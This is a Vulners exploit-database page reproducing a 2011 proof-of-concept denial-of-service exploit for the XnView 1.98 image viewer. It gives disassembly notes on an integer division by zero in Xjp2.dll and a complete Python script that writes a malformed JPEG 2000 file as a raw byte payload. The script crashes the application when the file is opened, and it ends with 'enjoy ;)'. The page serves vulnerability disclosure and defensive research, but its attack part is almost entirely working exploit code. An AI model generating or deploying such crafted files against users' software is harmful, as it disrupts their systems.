Vulners
Lucene search
XnView 1.98 Denial Of Service Proof Of Concept
`# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional
# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll MD5: 0c831c090f5a723d44bb641b175ca0e6
# DoS is caused by integer division by zero in module Xjp2.dll
# It can be triggered from:
# Local: C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \\MySecretServer\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# 1000D1C4 8A44BA 03 MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8 8941 E4 MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB 8B56 0C MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE 8D4413 FF LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2 33D2 XOR EDX,EDX
# 1000D1D4 F7F3 DIV EBX ; div by zero
# 1000D1D6 33D2 XOR EDX,EDX
# 1000D1D8 8BE8 MOV EBP,EAX
# 1000D1DA 8B46 04 MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD 8D4403 FF LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1 F7F3 DIV EBX
# 1000D1E3 8B59 E4 MOV EBX,DWORD PTR DS:[ECX-1C]
filepath = "C:\\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
f = open(filepath, "wb")
poc = '\x00\x00\x00\x0C\x6A\x50\x20\x20\x0D\x0A\x87\x0A\x00\x00\x00\x14\x66\x74\x79\x70\x6A\x70\x32\x20\x00\x00\x00\x00\x6A\x70\x32\x20\x00\x00\x00\x2D\x6A\x70\x32\x68\x00\x00\x00\x16\x69\x68\x64\x72\x00\x00\x00\x0D\x00\x00\x00\x0B\x00\x03\x07\x07\x00\x00\x00\x00\x00\x0F\x63\x6F\x6C\x72\x01\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x6A\x70\x32\x63\xFF\x4F\xFF\x51\x00\x2F\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x07\x00\x00\x07\x01\x01\x07\x01\x01\xFF\x5C\x00\x17\x42\x60\xC8\x42\x5D\x42\x5D\x42\x6D\x3A\xDB\x3A\xDB\x3B\x35\x32\xB8\x32\xB8\x32\x6B\xFF\x5D\x00\x18\x01\x42\x60\x6D\x41\xF2\x41\xF2\x42\x01\x3A\x6B\x3A\x6B\x3A\xC1\x32\x49\x32\x49\x31\xFF\xFF\x5D\x00\x18\x02\x42\x61\xAA\x43\x69\x43\x69\x43\x7A\x3B\xF3\x3B\xF3\x3C\x56\x33\xCC\x33\xCC\x33\x78\xFF\x52\x00\x0C\x00\x00\x00\x01\x01\x03\x04\x04\x00\x00\xFF\x64\x00\x0F\x00\x01\x4C\x57\x46\x5F\x4A\x50\x32\x5F\x32\x30\x37\xFF\x90\x00\x0A\x00\x00\x00\x00\x00\xA7\x00\x01\xFF\x93\xC7\xEC\x0C\x08\x8A\xC1\xC5\xD6\x54\xC0\x7D\x40\xA0\x0B\xBF\x3B\x6F\xDF\xC1\xF8\x02\x80\x03\x97\x3D\x32\x8B\xC0\xF8\x42\x87\xCE\x12\x07\xC2\x10\x01\x7F\x0C\x31\x03\x6B\x0B\xE3\xA0\x10\x80\x01\xC0\x74\x18\x1F\x08\x60\x04\x0C\x41\x6F\xC3\xE4\x13\x07\xC2\x34\x1F\x08\x80\x1C\xDD\xFD\x75\xB0\xA9\x74\x39\x3F\x0D\x31\x97\xD9\xD9\x7F\x0C\xAC\xCD\x9F\xC0\xE8\x60\x1F\x92\xE7\xC0\xE8\xB0\x3A\x1C\x04\x40\x1F\x1E\xA0\x20\x67\x12\x9A\x3F\x0C\xA7\xC3\xE1\x2A\x0E\x93\x07\x45\x61\x1C\x5E\xC3\xDD\xAC\x1B\xF5\x5B\xB9\x03\x8A\xAD\xF5\x07\x1F\x86\x1D\x5F\x19\xD8\x05\x13\xA3\xC0\x84\x5F\xC0\x8A\x04\x80\x01\x7F\x03\x9C\x46\xBF\xFF\xD9'
f.write(poc)
f.close()
print "Done, 1 file generated on 'C:\\' ..."
print "Open this file in XnView 1.98 and enjoy ;)"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jun 2011 00:00Current
0.1Low risk
Vulners AI Score0.1